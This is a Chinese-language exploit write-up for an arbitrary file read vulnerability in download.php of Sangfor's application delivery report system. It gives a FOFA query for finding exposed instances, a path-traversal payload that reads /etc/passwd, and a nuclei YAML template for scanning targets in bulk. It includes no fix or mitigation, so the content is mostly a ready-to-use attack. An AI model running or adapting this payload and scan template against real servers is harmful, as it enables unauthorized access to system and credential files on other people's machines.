深信服应用交付报表系统download.php任意文件读取漏洞

漏洞描述

深信服 应用交付报表系统download.php文件存在任意文件读取漏洞，攻击者通过漏洞可以下载服务器任意文件。

漏洞影响

深信服 应用交付报表系统

漏洞复现

fofa搜索环境复现：app="SANGFOR-应用交付报表系统"
登录页面：

payload：/report/download.php?pdf=../../../../../etc/passwd

nuclei批量yaml文件

id: sangfor_baobiao_fileread
info:
  name: 应用交付报表系统download.php任意文件读取漏洞
  author: mhb17
  severity: high
  description: description
  reference:
    - https://
  tags: fileread
requests:
  - raw:
      - |+
        GET /report/download.php?pdf=../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close

    matchers:
      - type: word
        part: header
        words:
          - '200'
      - type: regex
        regex:
          - "root:.*:0:0:"